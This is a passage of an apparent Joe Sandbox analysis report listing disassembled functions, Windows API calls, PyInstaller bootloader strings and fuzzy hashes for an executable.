                                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6B75086B7,?,?,00000000,00007FF6B7503CBB), ref: 00007FF6B750822C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502810: MessageBoxW.USER32 ref: 00007FF6B75028EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                              • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                              • Instruction ID: 64c9254f4cc18c1062e46c0276ede67bee28ea1b66b377b9b023a1583293e9f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24519313A2CA8781FA619B2DE851AFA63A0AF94788F444435DB4ED36F5EE3CF5048740
                                                                                                                                                                                                                                              Function 00007FF6B7502180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction ID: 22ad40ebae3de3366863d30a60ff3b0a44f7f7b56b0eb5529f86f249ebe4b085
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1051E726608BA186D6349F36E4581BAB7A1F798B65F004125EFDE836A4EF3CD085DB10
                                                                                                                                                                                                                                              Function 00007FF6B75080C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction ID: 5366563b7c7873b22ac9c7ec1e089b531d78b2e5d599c86f239c1fcb5f5fc67b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B219223B0CA4282EB458B7EE8545B96361FF88B94F584235DB6DC33F4EE2CE5918341
                                                                                                                                                                                                                                              Function 00007FF6B7516290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction ID: c4733eaa1329521d65f513c589a98c92650a635fbfeec5a90d75ea550f6378d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A128163E0C2A386FB205F18D1546B976A1FB50752F888135E78B86EE4DF3CE980CB10
                                                                                                                                                                                                                                              Function 00007FF6B7510FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction ID: ac11f2da6b373fe71ff394aa5867e5bdf766a2b15bf0cee618d3e2b85ee76662
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB129463E0C5A386FB205F1CE05467976A5FB40756F954071D79A86EE8DF7CE980CB00
                                                                                                                                                                                                                                              Function 00007FF6B7501050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: 9e6d356331cceb36e06eccad6adf1a3c001823f33e5e99eafa3b8aac7d5c78d7
                                                                                                                                                                                                                                              • Instruction ID: d15e8edc4f45c5f271024c7f72dfc8627a41669d215db790b53297602b771fef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6d356331cceb36e06eccad6adf1a3c001823f33e5e99eafa3b8aac7d5c78d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6419063B0C65282FA14DB1AA8006B963A1FF44BC8F944432EF4D877A6DE3CF542C781
                                                                                                                                                                                                                                              Function 00007FF6B7501470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: 1f9944f3975ec637b67728bc3c41dfd727d4deabf5f38a4d76f85a3f7c038b2f
                                                                                                                                                                                                                                              • Instruction ID: 45ed98669c2f5c538919f4ea6eed95d4527243c82f7e3c2e27c677da55cbe8a0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f9944f3975ec637b67728bc3c41dfd727d4deabf5f38a4d76f85a3f7c038b2f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D418023A0C65286EB10DF2994415B963A0FF44798F444936EF4D8BBB5EE3CE542CB01
                                                                                                                                                                                                                                              Function 00007FF6B750EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                              • Instruction ID: 0f6f161b265eec980ae33d0b35f7936975ffc0c3fa9cf963a21a6fa9547c57f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FD16C73A0CB458AEB60AB6994403AD77A0FB4578CF240139EF4D97BA6DF38E591C700
                                                                                                                                                                                                                                              Function 00007FF6B7502C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502C9E
                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502D63
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6B7502D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                              • Instruction ID: f34275d7c7839644d7230baefb48d72bfd76ee537afc4b6542ef25829316cf4b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD31D827B0CA4542E6219B29B8102AB67A1BF88798F410136EF4DD7779EF3CD646C700
                                                                                                                                                                                                                                              Function 00007FF6B750DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD4D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD5B
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD85
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DDF3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DDFF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction ID: 6e688795dbb874b520d03be46d44b84a0809813ed08d6bb98db52e5100d8b550
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7131C563B1EB42D1EE529B0AA4106B563A4FF48BA8F594535DF5DC73A0EF3CE4449310
                                                                                                                                                                                                                                              Function 00007FF6B7506360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                              • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                              • Instruction ID: 81718045b4f0cc2df8531e2afdf1908686f62bc0f3d0074c7a022fbbb2a69b9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10417F23A1CA8791EB25DB28E4542E96321FF44398F800132EB5D876F6EF3CE609C740
                                                                                                                                                                                                                                              Function 00007FF6B7502A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6B750351A,?,00000000,00007FF6B7503F23), ref: 00007FF6B7502AA0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction ID: 8c35499528c39134f5f1d509e0d18074a5e02f9d051e11ab1c8276c4dd5abcb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53218133A1CB8242E7209B59B8417EA63A4FB88784F400136FF8D93669EF7CD2458740
                                                                                                                                                                                                                                              Function 00007FF6B751B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                                                                                                                                                              • Instruction ID: ecca1fa4048c1f0645fd4cf9537cc6e17f9bc88fb270afc802bfe2f958577f01
